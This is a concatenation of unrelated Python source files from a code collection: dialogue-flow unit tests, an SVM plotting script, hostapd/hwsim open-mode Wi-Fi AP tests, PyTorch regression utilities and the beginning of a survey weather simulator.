assert convo.params.target_dialogue_state == target_dialogue_state
@pytest.mark.conversation
def test_reprocess_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('are there any stores near me?').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates="I'm not sure. You haven't told me where you are!")
@pytest.mark.conversation
def test_default_handler(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('Howdy!').directives
assert_target_dialogue_state(convo, 'send_store_hours_flow')
assert_reply(directives,
templates='Sorry, I did not get you. Which store would you like to know about?')
@pytest.mark.conversation
def test_repeated_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
for i in range(2):
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Which store would you like to know about?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('When does that open?').directives
assert_reply(directives, 'Sorry I cannot help you. Please try again.')
assert_target_dialogue_state(convo, None)
@pytest.mark.conversation
def test_intent_handler_and_exit_flow(async_kwik_e_mart_app, kwik_e_mart_app_path):
"""Tests that the params are cleared in one trip from app to mm."""
convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True)
convo.process('When does that open?')
assert_target_dialogue_state(convo, 'send_store_hours_flow')
directives = convo.process('exit').directives
assert_target_dialogue_state(convo, None)
assert_reply(directives, templates=['Bye', 'Goodbye', 'Have a nice day.'])
def assert_dialogue_state(dm, dialogue_state):
for rule in dm.rules:
if rule.dialogue_state == dialogue_state:
return True
return False
def test_dialogue_flow_async(async_kwik_e_mart_app):
@async_kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
async def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
async def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
async def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
def test_dialogue_flow(kwik_e_mart_app):
@kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent')
def some_handler(context, responder):
pass
assert some_handler.flow_state == 'some_handler_flow'
assert 'some_handler' in some_handler.all_flows
dm = some_handler.dialogue_manager
assert_dialogue_state(dm, 'some_handler')
assert_dialogue_state(dm, 'some_handler_flow')
assert len(some_handler.rules) == 0
@some_handler.handle(intent='some_intent')
def some_flow_handler(context, responder):
pass
assert len(some_handler.rules) == 1
@some_handler.handle(intent='some_intent_2', exit_flow=True)
def some_flow_handler_2(context, responder):
pass
assert len(some_handler.rules) == 2
assert 'some_flow_handler_2' in some_handler.exit_flow_states
| 2.34375 | 2 |
mine/src/main/python/SVM.py | nextzlog/mine | 3 | 3433 | import os,sys
import webbrowser
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.cm as cm
import matplotlib.pylab as plt
from matplotlib import ticker
plt.rcParams['font.family'] = 'monospace'
fig = plt.figure()
rect = fig.add_subplot(111, aspect='equal')
data0 = np.loadtxt('data0.dat', delimiter=',')
data1 = np.loadtxt('data1.dat', delimiter=',')
dense = np.loadtxt('dense.dat', delimiter=',')
ID = sys.argv[1]
X = np.arange(-2.0, 2.05, 0.05)
Y = np.arange(-2.0, 2.05, 0.05)
Xm, Ym = np.meshgrid(X, Y)
vmin, vmax = dense.min(), dense.max()
if vmin * vmax < 0:
vmin = -abs(max(-vmin, vmax))
vmax = +abs(max(-vmin, vmax))
cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower')
plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2])
plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2])
cb = plt.colorbar(cr, format='%+.1e')
cb.solids.set_edgecolor('face')
cb.set_ticks(ticker.LinearLocator(6))
cb.ax.tick_params(labelsize=12)
rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1)
rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1)
plt.xlim(X[0], X[-1])
plt.ylim(Y[0], Y[-1])
plt.xlabel("")
plt.ylabel("")
plt.grid(ls='dotted')
plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1)
plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1)
os.remove('dense.dat')
os.remove('data0.dat')
os.remove('data1.dat')
webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
| 2.375 | 2 |
sarna/report_generator/scores.py | rsrdesarrollo/sarna | 25 | 3434 | <gh_stars>10-100
from sarna.model.enums import Score, Language
from sarna.report_generator import make_run
from sarna.report_generator.locale_choice import locale_choice
from sarna.report_generator.style import RenderStyle
def score_to_docx(score: Score, style: RenderStyle, lang: Language):
ret = make_run(getattr(style, score.name.lower()), locale_choice(score, lang))
for warn in style._warnings:
# TODO: something
print(warn)
return ret
| 2.203125 | 2 |
tests/hwsim/test_ap_open.py | waittrue/wireless | 1 | 3435 | # Open mode AP tests
# Copyright (c) 2014, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import struct
import subprocess
import time
import os
import hostapd
import hwsim_utils
from tshark import run_tshark
from utils import alloc_fail
from wpasupplicant import WpaSupplicant
def test_ap_open(dev, apdev):
"""AP with open mode (no security) configuration"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bg_scan_period="0")
ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5)
if ev is None:
raise Exception("No connection event received from hostapd")
hwsim_utils.test_connectivity(dev[0], hapd)
dev[0].request("DISCONNECT")
ev = hapd.wait_event([ "AP-STA-DISCONNECTED" ], timeout=5)
if ev is None:
raise Exception("No disconnection event received from hostapd")
def test_ap_open_packet_loss(dev, apdev):
"""AP with open mode configuration and large packet loss"""
params = { "ssid": "open",
"ignore_probe_probability": "0.5",
"ignore_auth_probability": "0.5",
"ignore_assoc_probability": "0.5",
"ignore_reassoc_probability": "0.5" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(0, 3):
dev[i].connect("open", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
for i in range(0, 3):
dev[i].wait_connected(timeout=20)
def test_ap_open_unknown_action(dev, apdev):
"""AP with open mode configuration and unknown Action frame"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
bssid = apdev[0]['bssid']
cmd = "MGMT_TX {} {} freq=2412 action=765432".format(bssid, bssid)
if "FAIL" in dev[0].request(cmd):
raise Exception("Could not send test Action frame")
ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10)
if ev is None:
raise Exception("Timeout on MGMT-TX-STATUS")
if "result=SUCCESS" not in ev:
raise Exception("AP did not ack Action frame")
def test_ap_open_invalid_wmm_action(dev, apdev):
"""AP with open mode configuration and invalid WMM Action frame"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
bssid = apdev[0]['bssid']
cmd = "MGMT_TX {} {} freq=2412 action=1100".format(bssid, bssid)
if "FAIL" in dev[0].request(cmd):
raise Exception("Could not send test Action frame")
ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10)
if ev is None or "result=SUCCESS" not in ev:
raise Exception("AP did not ack Action frame")
def test_ap_open_reconnect_on_inactivity_disconnect(dev, apdev):
"""Reconnect to open mode AP after inactivity related disconnection"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
hapd.request("DEAUTHENTICATE " + dev[0].p2p_interface_addr() + " reason=4")
dev[0].wait_disconnected(timeout=5)
dev[0].wait_connected(timeout=2, error="Timeout on reconnection")
def test_ap_open_assoc_timeout(dev, apdev):
"""AP timing out association"""
ssid = "test"
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].scan(freq="2412")
hapd.set("ext_mgmt_frame_handling", "1")
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
for i in range(0, 10):
req = hapd.mgmt_rx()
if req is None:
raise Exception("MGMT RX wait timed out")
if req['subtype'] == 11:
break
req = None
if not req:
raise Exception("Authentication frame not received")
resp = {}
resp['fc'] = req['fc']
resp['da'] = req['sa']
resp['sa'] = req['da']
resp['bssid'] = req['bssid']
resp['payload'] = struct.pack('<HHH', 0, 2, 0)
hapd.mgmt_tx(resp)
assoc = 0
for i in range(0, 10):
req = hapd.mgmt_rx()
if req is None:
raise Exception("MGMT RX wait timed out")
if req['subtype'] == 0:
assoc += 1
if assoc == 3:
break
if assoc != 3:
raise Exception("Association Request frames not received: assoc=%d" % assoc)
hapd.set("ext_mgmt_frame_handling", "0")
dev[0].wait_connected(timeout=15)
def test_ap_open_id_str(dev, apdev):
"""AP with open mode and id_str"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", id_str="foo",
wait_connect=False)
ev = dev[0].wait_connected(timeout=10)
if "id_str=foo" not in ev:
raise Exception("CTRL-EVENT-CONNECT did not have matching id_str: " + ev)
if dev[0].get_status_field("id_str") != "foo":
raise Exception("id_str mismatch")
def test_ap_open_select_any(dev, apdev):
"""AP with open mode and select any network"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
id = dev[0].connect("unknown", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
dev[0].select_network(id)
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("No result reported")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
dev[0].select_network("any")
dev[0].wait_connected(timeout=10)
def test_ap_open_unexpected_assoc_event(dev, apdev):
"""AP with open mode and unexpected association event"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=15)
dev[0].dump_monitor()
# This will be accepted due to matching network
subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412",
apdev[0]['bssid']])
dev[0].wait_connected(timeout=15)
dev[0].dump_monitor()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=5)
dev[0].dump_monitor()
# This will result in disconnection due to no matching network
subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412",
apdev[0]['bssid']])
dev[0].wait_disconnected(timeout=15)
def test_ap_bss_load(dev, apdev):
"""AP with open mode (no security) configuration"""
hapd = hostapd.add_ap(apdev[0]['ifname'],
{ "ssid": "open",
"bss_load_update_period": "10" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
# this does not really get much useful output with mac80211_hwsim currently,
    # but run through the channel survey update a couple of times
for i in range(0, 10):
hwsim_utils.test_connectivity(dev[0], hapd)
hwsim_utils.test_connectivity(dev[0], hapd)
hwsim_utils.test_connectivity(dev[0], hapd)
time.sleep(0.15)
def hapd_out_of_mem(hapd, apdev, count, func):
with alloc_fail(hapd, count, func):
started = False
try:
hostapd.add_ap(apdev['ifname'], { "ssid": "open" })
started = True
except:
pass
if started:
raise Exception("hostapd interface started even with memory allocation failure: " + arg)
def test_ap_open_out_of_memory(dev, apdev):
"""hostapd failing to setup interface due to allocation failure"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_alloc_bss_data")
for i in range(1, 3):
hapd_out_of_mem(hapd, apdev[1], i, "hostapd_iface_alloc")
for i in range(1, 5):
hapd_out_of_mem(hapd, apdev[1], i, "hostapd_config_defaults;hostapd_config_alloc")
hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_config_alloc")
hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_driver_init")
for i in range(1, 4):
hapd_out_of_mem(hapd, apdev[1], i, "=wpa_driver_nl80211_drv_init")
# eloop_register_read_sock() call from i802_init()
hapd_out_of_mem(hapd, apdev[1], 1, "eloop_sock_table_add_sock;eloop_register_sock;?eloop_register_read_sock;=i802_init")
# verify that a new interface can still be added when memory allocation does
# not fail
hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" })
def test_bssid_black_white_list(dev, apdev):
"""BSSID black/white list"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist=apdev[1]['bssid'])
dev[1].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_blacklist=apdev[1]['bssid'])
dev[2].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist="00:00:00:00:00:00/00:00:00:00:00:00",
bssid_blacklist=apdev[1]['bssid'])
if dev[0].get_status_field('bssid') != apdev[1]['bssid']:
raise Exception("dev[0] connected to unexpected AP")
if dev[1].get_status_field('bssid') != apdev[0]['bssid']:
raise Exception("dev[1] connected to unexpected AP")
if dev[2].get_status_field('bssid') != apdev[0]['bssid']:
raise Exception("dev[2] connected to unexpected AP")
dev[0].request("REMOVE_NETWORK all")
dev[1].request("REMOVE_NETWORK all")
dev[2].request("REMOVE_NETWORK all")
dev[2].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist="00:00:00:00:00:00", wait_connect=False)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_whitelist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff")
dev[1].connect("open", key_mgmt="NONE", scan_freq="2412",
bssid_blacklist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff")
if dev[0].get_status_field('bssid') != apdev[1]['bssid']:
raise Exception("dev[0] connected to unexpected AP")
if dev[1].get_status_field('bssid') != apdev[0]['bssid']:
raise Exception("dev[1] connected to unexpected AP")
dev[0].request("REMOVE_NETWORK all")
dev[1].request("REMOVE_NETWORK all")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected dev[2] connectin")
dev[2].request("REMOVE_NETWORK all")
def test_ap_open_wpas_in_bridge(dev, apdev):
"""Open mode AP and wpas interface in a bridge"""
br_ifname='sta-br0'
ifname='wlan5'
try:
_test_ap_open_wpas_in_bridge(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'down'])
subprocess.call(['brctl', 'delif', br_ifname, ifname])
subprocess.call(['brctl', 'delbr', br_ifname])
subprocess.call(['iw', ifname, 'set', '4addr', 'off'])
def _test_ap_open_wpas_in_bridge(dev, apdev):
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
br_ifname='sta-br0'
ifname='wlan5'
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
# First, try a failure case of adding an interface
try:
wpas.interface_add(ifname, br_ifname=br_ifname)
raise Exception("Interface addition succeeded unexpectedly")
except Exception, e:
if "Failed to add" in str(e):
logger.info("Ignore expected interface_add failure due to missing bridge interface: " + str(e))
else:
raise
# Next, add the bridge interface and add the interface again
subprocess.call(['brctl', 'addbr', br_ifname])
subprocess.call(['brctl', 'setfd', br_ifname, '0'])
subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'up'])
subprocess.call(['iw', ifname, 'set', '4addr', 'on'])
subprocess.check_call(['brctl', 'addif', br_ifname, ifname])
wpas.interface_add(ifname, br_ifname=br_ifname)
wpas.connect("open", key_mgmt="NONE", scan_freq="2412")
def test_ap_open_start_disabled(dev, apdev):
"""AP with open mode and beaconing disabled"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open",
"start_disabled": "1" })
bssid = apdev[0]['bssid']
dev[0].flush_scan_cache()
dev[0].scan(freq=2412, only_new=True)
if dev[0].get_bss(bssid) is not None:
raise Exception("AP was seen beaconing")
if "OK" not in hapd.request("RELOAD"):
raise Exception("RELOAD failed")
dev[0].scan_for_bss(bssid, freq=2412)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
def test_ap_open_start_disabled2(dev, apdev):
"""AP with open mode and beaconing disabled (2)"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open",
"start_disabled": "1" })
bssid = apdev[0]['bssid']
dev[0].flush_scan_cache()
dev[0].scan(freq=2412, only_new=True)
if dev[0].get_bss(bssid) is not None:
raise Exception("AP was seen beaconing")
if "OK" not in hapd.request("UPDATE_BEACON"):
raise Exception("UPDATE_BEACON failed")
dev[0].scan_for_bss(bssid, freq=2412)
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
if "OK" not in hapd.request("UPDATE_BEACON"):
raise Exception("UPDATE_BEACON failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_ap_open_ifdown(dev, apdev):
"""AP with open mode and external ifconfig down"""
params = { "ssid": "open",
"ap_max_inactivity": "1" }
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("open", key_mgmt="NONE", scan_freq="2412")
subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'down'])
ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=10)
if ev is None:
raise Exception("Timeout on AP-STA-DISCONNECTED (1)")
ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=5)
if ev is None:
raise Exception("Timeout on AP-STA-DISCONNECTED (2)")
ev = hapd.wait_event(["INTERFACE-DISABLED"], timeout=5)
if ev is None:
raise Exception("No INTERFACE-DISABLED event")
# The following wait tests beacon loss detection in mac80211 on dev0.
# dev1 is used to test stopping of AP side functionality on client polling.
dev[1].request("REMOVE_NETWORK all")
subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'up'])
dev[0].wait_disconnected()
dev[1].wait_disconnected()
ev = hapd.wait_event(["INTERFACE-ENABLED"], timeout=10)
if ev is None:
raise Exception("No INTERFACE-ENABLED event")
dev[0].wait_connected()
hwsim_utils.test_connectivity(dev[0], hapd)
def test_ap_open_disconnect_in_ps(dev, apdev, params):
"""Disconnect with the client in PS to regression-test a kernel bug"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bg_scan_period="0")
ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5)
if ev is None:
raise Exception("No connection event received from hostapd")
time.sleep(0.2)
hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_MANUAL_POLL)
try:
# inject some traffic
sa = hapd.own_addr()
da = dev[0].own_addr()
hapd.request('DATA_TEST_CONFIG 1')
hapd.request('DATA_TEST_TX {} {} 0'.format(da, sa))
hapd.request('DATA_TEST_CONFIG 0')
# let the AP send couple of Beacon frames
time.sleep(0.3)
# disconnect - with traffic pending - shouldn't cause kernel warnings
dev[0].request("DISCONNECT")
finally:
hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_DISABLED)
time.sleep(0.2)
out = run_tshark(os.path.join(params['logdir'], "hwsim0.pcapng"),
"wlan_mgt.tim.partial_virtual_bitmap",
["wlan_mgt.tim.partial_virtual_bitmap"])
if out is not None:
state = 0
for l in out.splitlines():
pvb = int(l, 16)
if pvb > 0 and state == 0:
state = 1
elif pvb == 0 and state == 1:
state = 2
if state != 2:
raise Exception("Didn't observe TIM bit getting set and unset (state=%d)" % state)
def test_ap_open_select_network(dev, apdev):
"""Open mode connection and SELECT_NETWORK to change network"""
hapd1 = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
bssid1 = apdev[0]['bssid']
hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open2" })
bssid2 = apdev[1]['bssid']
id1 = dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
id2 = dev[0].connect("open2", key_mgmt="NONE", scan_freq="2412")
hwsim_utils.test_connectivity(dev[0], hapd2)
dev[0].select_network(id1)
dev[0].wait_connected()
res = dev[0].request("BLACKLIST")
if bssid1 in res or bssid2 in res:
raise Exception("Unexpected blacklist entry")
hwsim_utils.test_connectivity(dev[0], hapd1)
dev[0].select_network(id2)
dev[0].wait_connected()
hwsim_utils.test_connectivity(dev[0], hapd2)
res = dev[0].request("BLACKLIST")
if bssid1 in res or bssid2 in res:
raise Exception("Unexpected blacklist entry(2)")
def test_ap_open_disable_enable(dev, apdev):
"""AP with open mode getting disabled and re-enabled"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
dev[0].connect("open", key_mgmt="NONE", scan_freq="2412",
bg_scan_period="0")
for i in range(2):
hapd.request("DISABLE")
dev[0].wait_disconnected()
hapd.request("ENABLE")
dev[0].wait_connected()
hwsim_utils.test_connectivity(dev[0], hapd)
def sta_enable_disable(dev, bssid):
dev.scan_for_bss(bssid, freq=2412)
work_id = dev.request("RADIO_WORK add block-work")
ev = dev.wait_event(["EXT-RADIO-WORK-START"])
if ev is None:
raise Exception("Timeout while waiting radio work to start")
id = dev.connect("open", key_mgmt="NONE", scan_freq="2412",
only_add_network=True)
dev.request("ENABLE_NETWORK %d" % id)
if "connect@" not in dev.request("RADIO_WORK show"):
raise Exception("connect radio work missing")
dev.request("DISABLE_NETWORK %d" % id)
dev.request("RADIO_WORK done " + work_id)
ok = False
for i in range(30):
if "connect@" not in dev.request("RADIO_WORK show"):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("connect radio work not completed")
ev = dev.wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
if ev is not None:
raise Exception("Unexpected connection")
dev.request("DISCONNECT")
def test_ap_open_sta_enable_disable(dev, apdev):
"""AP with open mode and wpa_supplicant ENABLE/DISABLE_NETWORK"""
hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" })
bssid = apdev[0]['bssid']
sta_enable_disable(dev[0], bssid)
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
sta_enable_disable(wpas, bssid)
| 2.28125 | 2 |
task_templates/pipelines/python3_pytorch_regression/model_utils.py | andreakropp/datarobot-user-models | 0 | 3436 | <reponame>andreakropp/datarobot-user-models
#!/usr/bin/env python
# coding: utf-8
# pylint: disable-all
from __future__ import absolute_import
from sklearn.preprocessing import LabelEncoder
from pathlib import Path
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
class BinModel(nn.Module):
expected_target_type = torch.FloatTensor
def __init__(self, input_size):
super(BinModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
self.out_act = nn.Sigmoid()
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
a3 = self.out(h2)
y = self.out_act(a3)
return y
class RegModel(nn.Module):
def __init__(self, input_size):
super(RegModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
y = self.out(h2)
return y
class MultiModel(nn.Module):
expected_target_type = torch.LongTensor
def __init__(self, input_size, output_size):
super(MultiModel, self).__init__()
self.layer1 = nn.Linear(input_size, 8)
self.relu = nn.ReLU()
self.layer2 = nn.Linear(8, output_size)
self.out = nn.Softmax()
def forward(self, input_):
out = self.layer1(input_)
out = self.relu(out)
out = self.layer2(out)
out = self.out(out)
return out
def train_epoch(model, opt, criterion, X, y, batch_size=50):
model.train()
losses = []
for beg_i in range(0, X.size(0), batch_size):
x_batch = X[beg_i : beg_i + batch_size, :]
# y_hat will be (batch_size, 1) dim, so coerce target to look the same
y_batch = y[beg_i : beg_i + batch_size].reshape(-1, 1)
x_batch = Variable(x_batch)
y_batch = Variable(y_batch)
opt.zero_grad()
# (1) Forward
y_hat = model(x_batch)
# (2) Compute diff
loss = criterion(y_hat, y_batch)
# (3) Compute gradients
loss.backward()
# (4) update weights
opt.step()
losses.append(loss.data.numpy())
return losses
def build_classifier(X, num_labels):
class_model = BinModel(X.shape[1]) if num_labels == 2 else MultiModel(X.shape[1], num_labels)
class_opt = optim.Adam(class_model.parameters(), lr=0.001)
class_criterion = nn.BCELoss() if num_labels == 2 else nn.CrossEntropyLoss()
return class_model, class_opt, class_criterion
def build_regressor(X):
reg_model = RegModel(X.shape[1])
reg_opt = optim.Adam(reg_model.parameters(), lr=0.001)
reg_criterion = nn.MSELoss()
return reg_model, reg_opt, reg_criterion
def train_classifier(X, y, class_model, class_opt, class_criterion, n_epochs=5):
target_encoder = LabelEncoder()
target_encoder.fit(y)
transformed_y = target_encoder.transform(y)
bin_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
bin_t_y = torch.from_numpy(transformed_y).type(class_model.expected_target_type)
for e in range(n_epochs):
train_epoch(class_model, class_opt, class_criterion, bin_t_X, bin_t_y)
def train_regressor(X, y, reg_model, reg_opt, reg_criterion, n_epochs=5):
reg_t_X = torch.from_numpy(X.values).type(torch.FloatTensor)
reg_t_y = torch.from_numpy(y.values).type(torch.FloatTensor)
for e in range(n_epochs):
train_epoch(reg_model, reg_opt, reg_criterion, reg_t_X, reg_t_y)
def save_torch_model(model, output_dir_path, filename="torch_bin.pth"):
output_file_path = Path(output_dir_path) / filename
torch.save(model, output_file_path)
def subset_data(X):
numerics = ["int16", "int32", "int64", "float16", "float32", "float64"]
# exclude any completely-missing columns when checking for numerics
num_features = list(X.dropna(axis=1, how="all").select_dtypes(include=numerics).columns)
# keep numeric features, zero-impute any missing values
# obviously this is a very rudimentary approach to handling missing values
# a more sophisticated imputer can be implemented by making use of custom transform, load, and predict hooks
return X[num_features].fillna(0)
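# End-to-end usage sketch (illustrative only; the column names, sizes and
# output directory below are made up, not part of the template contract).
def _demo_binary_training(output_dir='.'):
    import numpy as np
    import pandas as pd
    X = pd.DataFrame(np.random.rand(200, 5),
                     columns=['f' + str(i) for i in range(5)])
    y = pd.Series(np.random.randint(0, 2, size=200))
    X = subset_data(X)  # keep numeric columns, zero-impute missing values
    model, opt, criterion = build_classifier(X, num_labels=2)
    train_classifier(X, y, model, opt, criterion, n_epochs=2)
    save_torch_model(model, output_dir)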
| 2.6875 | 3 |
py/surveysim/weather.py | mlandriau/surveysim | 0 | 3437 | <reponame>mlandriau/surveysim
"""Simulate stochastic observing weather conditions.
The simulated conditions include seeing, transparency and the dome-open fraction.
"""
from __future__ import print_function, division, absolute_import
from datetime import datetime
import numpy as np
import astropy.time
import astropy.table
import astropy.units as u
import desiutil.log
import desimodel.weather
import desisurvey.config
import desisurvey.ephem
import desisurvey.utils
class Weather(object):
"""Simulate weather conditions affecting observations.
The start/stop date range is taken from the survey config.
Seeing and transparency values are stored with 32-bit floats to save
some memory.
Parameters
----------
seed : int
Random number seed to use to generate stochastic conditions.
The seed determines the same seeing and transparency realization
independent of the value of ``replay``.
replay : str
Either 'random' or a comma-separated list of years whose
historical weather should be replayed, e.g. 'Y2010,Y2012'.
Replayed weather will be used cyclically if necessary.
        Random weather will be a bootstrap sampling of all available
years with historical weather data. Use 'Y2015' for the
worst-case weather scenario.
time_step : float or :class:`astropy.units.Quantity`, optional
Time step calculating updates. Must evenly divide 24 hours.
If unitless float, will be interpreted as minutes.
restore : filename or None
Restore an existing weather simulation from the specified file name.
All other parameters are ignored when this is provided. A relative path
name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
extra_downtime : float
Additionally close the dome completely on some nights. Nights are
chosen randomly, with the chance of the night being closed equal to
extra_random_close_fraction. This is intended to include margin.
"""
def __init__(self, seed=1, replay='random', time_step=5, restore=None,
extra_downtime=0):
